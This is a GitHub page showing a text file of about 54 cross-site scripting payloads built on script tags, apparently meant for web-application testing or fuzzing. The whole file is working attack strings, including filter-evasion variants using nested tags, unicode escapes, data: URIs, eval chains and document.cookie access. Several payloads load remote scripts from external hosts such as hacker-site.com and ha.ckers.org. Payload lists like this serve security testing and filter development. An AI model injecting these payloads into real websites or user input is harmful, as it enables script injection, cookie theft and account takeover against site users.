-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathscript_tag.txt
More file actions
57 lines (53 loc) · 3.15 KB
/
script_tag.txt
File metadata and controls
57 lines (53 loc) · 3.15 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<!--[if]><script>javascript:alert(1)</script -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<script src="javascript:alert(1)">
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<script ^__^>alert(String.fromCharCode(49))</script ^__^
<script   :-(>/**/alert(document.location)/**/</script   :-(
<script src="data:text/javascript,alert(1)"></script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<script itworksinallbrowsers>/*<script* */alert(1)</script>
<script x> alert(1) </script 1=2>
<script>alert(1);</script>
<script>alert('XSS');</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<script src="data:text/javascript,alert(1)"></script>
<svg><script href="data:text/javascript,alert(1)" />
<script language="JavaScript">alert('XSS')</script>
><script>alert(document.cookie)</script> ‘””>
<script language=”JavaScript”> alert(‘X \nS \nS’);</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> ‘></select>
<script>alert(123)</script> ‘>”
<script src = ‘http://www.site.com/XSS.js’></script> }</style>
<script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write(“XSS”);</SCRIPT>
a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);
=’><script>alert(“xss”)</script>
<script+src=”>”+src=”http://yoursite.com/xss.js?69,69″></script>
<body background=javascript:'”><script>alert(navigator.userAgent)</script>></body>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
<SCRIPT> alert(“XSS”); </SCRIPT>
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <
BASE HREF="javascript:alert('XSS');//"> <
BGSOUND SRC="javascript:alert('XSS');"> <